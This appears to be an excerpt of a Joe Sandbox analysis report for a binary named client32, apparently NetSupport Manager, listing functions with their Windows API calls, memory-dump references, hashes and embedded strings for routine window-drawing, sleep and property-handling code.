                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                                                                    • Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
                                                                                                                                    • Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                                                                    • Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116ACCA Relevance: 1.3, APIs: 1, Instructions: 32sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(00000000,00000000,00000000,?,11163D2C,00000000,00000010,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C), ref: 1116ACF4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                    • Opcode ID: 87b20f13d27668aaa1bafaa4323f9e54366b74c23759c72a71bdc553c6de7698
                                                                                                                                    • Instruction ID: 18a7264a6f2f35495167912cf538a4f9c0473c6b84a65a24d75b4e5ba5d63308
                                                                                                                                    • Opcode Fuzzy Hash: 87b20f13d27668aaa1bafaa4323f9e54366b74c23759c72a71bdc553c6de7698
                                                                                                                                    • Instruction Fuzzy Hash: 1FF027338001269B8B214D76E94048AFF5DDB823BA7204232F538C20C0D673DC50DB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116AC7E Relevance: 1.3, APIs: 1, Instructions: 30sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(00000000,1103179F,?,00000000), ref: 1116ACA6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                    • Opcode ID: 4da60ea5e59d78e2dc0770e15666bccac51a2e8fafc3d1a4a2a46a71e5d7d91d
                                                                                                                                    • Instruction ID: 80a9ac4ad538485578ac587e7291ff48a6c688023c670079c4644ca80f4236d7
                                                                                                                                    • Opcode Fuzzy Hash: 4da60ea5e59d78e2dc0770e15666bccac51a2e8fafc3d1a4a2a46a71e5d7d91d
                                                                                                                                    • Instruction Fuzzy Hash: 2BE0E5369001666BC7225A76EE44A86BF9ADB81378F100331F938C22D4D7729851C391
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116AC39 Relevance: 1.3, APIs: 1, Instructions: 28sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                    • Sleep.KERNEL32(00000000,00000001,?,?,1117452A,00000018,111DD378,0000000C,111745BA,?,?,?,1116C592,0000000D), ref: 1116AC5A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeapSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4201116106-0
                                                                                                                                    • Opcode ID: 948d81363eb1791dac651a7b0fc8680c7a7ca23552a52a7bcbd1fb22d31900a1
                                                                                                                                    • Instruction ID: b5f8bbebd407ced262cd12d878d929b23d0acb85113cb8d605170584b1f1f64a
                                                                                                                                    • Opcode Fuzzy Hash: 948d81363eb1791dac651a7b0fc8680c7a7ca23552a52a7bcbd1fb22d31900a1
                                                                                                                                    • Instruction Fuzzy Hash: 1DE092379405675BC3215A7AE99489ABF5EDBC12B53200331EA78C3194D662DC91C390
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 110077A0 Relevance: 81.0, APIs: 32, Strings: 14, Instructions: 548windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11088BE0: IsWindow.USER32(11005652), ref: 11088BFC
                                                                                                                                      • Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16
                                                                                                                                    • LoadCursorA.USER32 ref: 110077EA
                                                                                                                                    • SetCursor.USER32(00000000), ref: 110077F1
                                                                                                                                    • GetDC.USER32(?), ref: 1100781D
                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 1100782A
                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11007942
                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007956
                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 11007963
                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007975
                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 110079A1
                                                                                                                                      • Part of subcall function 110022D0: DeleteObject.GDI32(?), ref: 110022E1
                                                                                                                                      • Part of subcall function 110022D0: CreatePen.GDI32(?,?,?), ref: 11002308
                                                                                                                                      • Part of subcall function 11005B70: CreateSolidBrush.GDI32(?), ref: 11005B97
                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 110079E0
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110079ED
                                                                                                                                    • DeleteDC.GDI32(?), ref: 110079FA
                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007A17
                                                                                                                                    • ReleaseDC.USER32 ref: 11007A46
                                                                                                                                    • CreatePen.GDI32(00000002,00000001,00000000), ref: 11007A51
                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11007B42
                                                                                                                                    • GetSysColor.USER32(00000004), ref: 11007B50
                                                                                                                                    • LoadBitmapA.USER32 ref: 11007B67
                                                                                                                                      • Part of subcall function 11142F40: GetObjectA.GDI32(11003D76,00000018,?), ref: 11142F53
                                                                                                                                      • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F61
                                                                                                                                      • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F66
                                                                                                                                      • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F7E
                                                                                                                                      • Part of subcall function 11142F40: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11142F91
                                                                                                                                      • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F9C
                                                                                                                                      • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11142FA6
                                                                                                                                      • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11142FC3
                                                                                                                                      • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,00000000), ref: 11142FCC
                                                                                                                                      • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142FD8
                                                                                                                                      • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142FF5
                                                                                                                                      • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11143000
                                                                                                                                      • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00000000), ref: 11143009
                                                                                                                                      • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11143026
                                                                                                                                      • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11143031
                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007C65
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 11007C9F
                                                                                                                                    • GetObjectA.GDI32(00000000), ref: 11007CA6
                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007CB3
                                                                                                                                    • GetWindowRect.USER32 ref: 11007DF6
                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 11007E33
                                                                                                                                    • GetSystemMetrics.USER32 ref: 11007E53
                                                                                                                                    • GetSystemMetrics.USER32 ref: 11007E70
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007EC0
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11007986
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32 ref: 1109599E
                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32 ref: 110959A7
                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32 ref: 110959AE
                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32 ref: 110959B7
                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32 ref: 110959BD
                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32 ref: 110959C5
                                                                                                                                    • UpdateWindow.USER32(?), ref: 11007EF2
                                                                                                                                    • SetCursor.USER32(?), ref: 11007EFF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdatewsprintf
                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 2899290145-2303488826
                                                                                                                                    • Opcode ID: 7dd2ac6c7ff27049dc65c6b4ff4272b112a43ebb397a73c11201044687122db6
                                                                                                                                    • Instruction ID: 6182bcd3debcd054039c16ce38c58758ae1f5640e4e16b95df98d0b4ae7a1d43
                                                                                                                                    • Opcode Fuzzy Hash: 7dd2ac6c7ff27049dc65c6b4ff4272b112a43ebb397a73c11201044687122db6
                                                                                                                                    • Instruction Fuzzy Hash: 5422C7B5A00719AFE714CFA4CC85FEAF7B8FB48708F0045A9E26A97684D774A940CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100892B Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 414COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetPropA.USER32 ref: 11008A16
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                      • Part of subcall function 11005410: GetObjectA.GDI32(?,0000003C,?), ref: 110054E5
                                                                                                                                      • Part of subcall function 11005410: wsprintfA.USER32 ref: 1100553D
                                                                                                                                    • GetPropA.USER32 ref: 11008A25
                                                                                                                                    • wsprintfA.USER32 ref: 11008A54
                                                                                                                                    • RemovePropA.USER32 ref: 11008A88
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Propwsprintf$ErrorExitLastMessageObjectProcessRemove
                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$NSMAnnotate::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                                                    • API String ID: 869764834-186141278
                                                                                                                                    • Opcode ID: 0262f33b45fd045501bfc209f1bd4c363809984cc0be8ceb014ec124e93ed540
                                                                                                                                    • Instruction ID: 80c2cff1ab1a22a4b76193193ce02908356bed8a5bad52033486d257d4387e30
                                                                                                                                    • Opcode Fuzzy Hash: 0262f33b45fd045501bfc209f1bd4c363809984cc0be8ceb014ec124e93ed540
                                                                                                                                    • Instruction Fuzzy Hash: 84B1D531B001199BEB18DFA5DC94FBFB7A8FF99314F0042AFE9069B280DA745950D7A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110CB750 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 168windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32 ref: 110CB7D9
                                                                                                                                    • IsIconic.USER32(000019E5), ref: 110CB7E9
                                                                                                                                    • GetClientRect.USER32 ref: 110CB7F8
                                                                                                                                    • GetSystemMetrics.USER32 ref: 110CB80D
                                                                                                                                    • GetSystemMetrics.USER32 ref: 110CB814
                                                                                                                                    • IsIconic.USER32(000019E5), ref: 110CB844
                                                                                                                                    • GetWindowRect.USER32 ref: 110CB853
                                                                                                                                    • SetWindowPos.USER32(?,00000000,11186ABB,000000FF,00000000,00000000,0000001D,00000000,?,00000001,11186ABB,00000002), ref: 110CB907
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                                                                    • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                                                                    • API String ID: 2655531791-1552842965
                                                                                                                                    • Opcode ID: 1ee7eaa446c991a1a7228957014a74cfc1595790674e05bbeac00a9f460b5f81
                                                                                                                                    • Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
                                                                                                                                    • Opcode Fuzzy Hash: 1ee7eaa446c991a1a7228957014a74cfc1595790674e05bbeac00a9f460b5f81
                                                                                                                                    • Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1115F840 Relevance: 18.0, APIs: 8, Strings: 2, Instructions: 459COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F886
                                                                                                                                    • RemovePropA.USER32 ref: 1115F8A5
                                                                                                                                    • RemovePropA.USER32 ref: 1115F8B4
                                                                                                                                    • RemovePropA.USER32 ref: 1115F8C3
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    • CallWindowProcA.USER32 ref: 1115FC59
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$old_wndproc
                                                                                                                                    • API String ID: 1777853711-3305400014
                                                                                                                                    • Opcode ID: d15fbf1ee6f48fdfeb5a3f8b4ce6e4d3d5fcee809489cf716bc2b57072c05fa9
                                                                                                                                    • Instruction ID: 2a1ce18ce9ffe677ff7d10ad8131c1a7db68a641085b95e9de3494b6caebac20
                                                                                                                                    • Opcode Fuzzy Hash: d15fbf1ee6f48fdfeb5a3f8b4ce6e4d3d5fcee809489cf716bc2b57072c05fa9
                                                                                                                                    • Instruction Fuzzy Hash: 39D18E7530411A9BD748CE69E894EBBB3EAEBC9310B10466EFD56C3781DA31AC1187B1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

